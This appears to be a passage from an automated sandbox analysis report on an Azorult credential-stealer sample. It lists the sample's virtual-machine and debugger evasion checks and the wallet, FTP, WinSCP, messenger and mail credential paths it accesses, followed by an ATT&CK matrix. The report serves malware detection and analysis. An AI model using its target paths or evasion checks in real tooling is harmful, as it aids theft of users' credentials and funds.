          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmp | Binary or memory string: vmicshutdown
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmp | Binary or memory string: vmicvss
          Source: cjwe.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Data Exchange Service
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Heartbeat Service
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Service Interface
          Source: cjwe.exe, 00000000.00000002.238178775.00000000048BA000.00000004.00000001.sdmp | Binary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\cjwe.exe | Process information queried: ProcessInformation

          Anti Debugging:

          Contains functionality to hide a thread from the debugger
          Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02230E22 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,00000000 0_2_02230E22
          Hides threads from debuggers
          Source: C:\Users\user\Desktop\cjwe.exe | Thread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\cjwe.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02230E22 rdtsc 0_2_02230E22
          Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02230E22 mov eax, dword ptr fs:[00000030h] 0_2_02230E22
          Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02232E13 mov eax, dword ptr fs:[00000030h] 0_2_02232E13
          Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02233107 mov eax, dword ptr fs:[00000030h] 0_2_02233107
          Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_02231B7D mov eax, dword ptr fs:[00000030h] 0_2_02231B7D
          Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_0223135F mov eax, dword ptr fs:[00000030h] 0_2_0223135F
          Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_022335F7 mov eax, dword ptr fs:[00000030h] 0_2_022335F7
          Source: C:\Users\user\Desktop\cjwe.exe | Code function: 0_2_022335D0 mov eax, dword ptr fs:[00000030h] 0_2_022335D0
          Source: C:\Users\user\Desktop\cjwe.exe | Process created: C:\Users\user\Desktop\cjwe.exe 'C:\Users\user\Desktop\cjwe.exe'
          Source: C:\Users\user\Desktop\cjwe.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\Desktop\cjwe.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected Azorult
          Source: Yara match | File source: 00000003.00000003.295447945.000000001F41C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: cjwe.exe PID: 6896, type: MEMORY
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmp | String found in binary or memory: %appdata%\Electrum\wallets\
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmp | String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmp | String found in binary or memory: %APPDATA%\Exodus\
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmp | String found in binary or memory: %APPDATA%\Ethereum\keystore\
          Source: cjwe.exe, 00000003.00000003.295919347.000000001EC30000.00000004.00000001.sdmp | String found in binary or memory: %appdata%\Electrum-LTC\wallets\
          Tries to harvest and steal Bitcoin Wallet information
          Source: C:\Users\user\Desktop\cjwe.exe | Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
          Source: C:\Users\user\Desktop\cjwe.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\cjwe.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\cjwe.exe | File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\cjwe.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
          Source: C:\Users\user\Desktop\cjwe.exe | File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\
          Tries to steal Instant Messenger accounts or passwords
          Source: C:\Users\user\Desktop\cjwe.exe | File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
          Tries to steal Mail credentials (via file access)
          Source: C:\Users\user\Desktop\cjwe.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Windows Management Instrumentation | DLL Side-Loading1 | Process Injection11 | Virtualization/Sandbox Evasion22 | OS Credential Dumping1 | Security Software Discovery421 | Remote Services | Email Collection1 | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Process Injection11 | Credentials in Registry2 | Virtualization/Sandbox Evasion22 | Remote Desktop Protocol | Data from Local System3 | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information1 | Credentials In Files1 | Process Discovery11 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Timestomp1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading1 | LSA Secrets | System Information Discovery23 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |

          Behavior Graph

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet